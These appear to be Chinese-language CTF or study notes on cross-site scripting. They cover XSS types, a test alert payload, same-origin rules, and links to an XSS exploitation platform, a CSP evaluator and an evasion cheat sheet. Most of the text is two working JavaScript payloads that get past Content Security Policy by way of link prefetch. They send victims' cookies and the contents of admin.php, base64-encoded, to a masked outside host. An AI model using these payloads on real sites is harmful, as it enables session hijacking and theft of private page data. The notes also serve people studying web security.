XSS攻击可以分为3类:存储型(持久型)、反射型(非持久型)、基于DOM。
<scrpit>alert('XSS')</script>
- XSS without HTML: Client-Side Template Injection with AngularJS 关键词:客户端模板注入、AngularJS
- XSS online利用平台:https://xsspt.com/
- XSS Filter Evasion Cheat Sheet
同源:协议、域名、端口相同。
-
CSP online检测工具:https://csp-evaluator.withgoogle.com/
利用<link>
绕过CSP,发送cookie
<script>
$.get("admin.php", function(data){
var content = window.btoa(document.cookie).concat(window.btoa(data));
var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "http://***/".concat(content));
document.head.appendChild(n0t);
});
</script>
在上述基础上访问其他页面
<script>
getText = function(url, callback)
{
var request = new XMLHttpRequest();
request.onreadystatechange = function()
{
if (request.readyState == 4 && request.status == 200)
{
callback(request.responseText);
}
};
request.open("GET", url);
request.send();
}
function mycallback(data) {
var content =concat(window.btoa(data));
var n0t = document.createElement("link");
n0t.setAttribute("rel", "prefetch");
n0t.setAttribute("href", "http://*****/".concat(content));
document.head.appendChild(n0t);
}
getText("admin.php", mycallback);
</script>
- AMP HTML 关于XSS的CTF WRITE UP AMP获取cookies的方法